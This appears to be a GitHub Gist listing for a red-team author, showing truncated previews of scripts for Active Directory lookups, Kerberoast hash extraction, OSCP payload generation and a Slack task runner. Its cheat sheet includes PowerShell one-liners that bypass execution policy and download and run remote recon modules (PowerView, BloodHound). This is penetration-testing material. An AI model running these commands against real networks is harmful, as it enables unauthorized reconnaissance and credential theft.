Skip to content

Instantly share code, notes, and snippets.

m8r0wn /
Last active Mar 8, 2021
Python class to interact with the Pastebin API
#!/usr/bin/env python2.7
# Author: m8r0wn
# Description: Python class to interact with Pastebin API
import urllib2
import urllib
class paste_it():
#Class Variables
#!/usr/bin/env bash
# Author: m8r0wn
# Description: Uses the Linux net commands to lookup a user in Active Directory
# This is the Linux equivalent of: net user [Username] /domain
# Usage: ./ [username] [password] [DC-Server] [Lookup-User]
if [ ! $1 ];
printf "[-] Usage: $0 Username Password DC_Server username_to_lookup\n"
m8r0wn / RedTeam_CheatSheet.ps1
Last active Jun 9, 2021
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
View RedTeam_CheatSheet.ps1
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('');Invoke-BloodHound"
m8r0wn /
Last active Jun 16, 2020
Extract hashes from Empires: "Invoke-kerberoast -OutputFormat Hashcat", for cracking.
from sys import argv
# Clean Kerberose hashes taken from invoke-kerberoast -hashcat output
hashes = [line.strip() for line in open(argv[1])]
hash_capture = False
hash_value = ''''''
for line in hashes:
#!/usr/bin/env bash
# Script to quickly and easily create non-meterpreter payloads for the OSCP
# m8r0wn
# Note: It is recommeneded to create a new directory before running this
# script. All payloads will be placed in the current directory
PORT=443 # You may have to change this if there are outbound restrictions on the target ;)
#!/usr/bin/env python3
from sys import argv
from taser.proto.http.spider import Spider
from taser.proto.http import extract_subdomain
from taser.logx import setup_consoleLogger
class MySpider(Spider):
def __init__(self, url):
Spider.__init__(self, url)
self.ur = url
m8r0wn /
Last active Mar 14, 2021
Python script to monitor a Slack channel and automate task execution.
#!/usr/bin/env python3
# Author: m8r0wn
import os
import threading
from sys import exit
from time import sleep
from datetime import datetime
from subprocess import getoutput
from taser.proto.http import web_request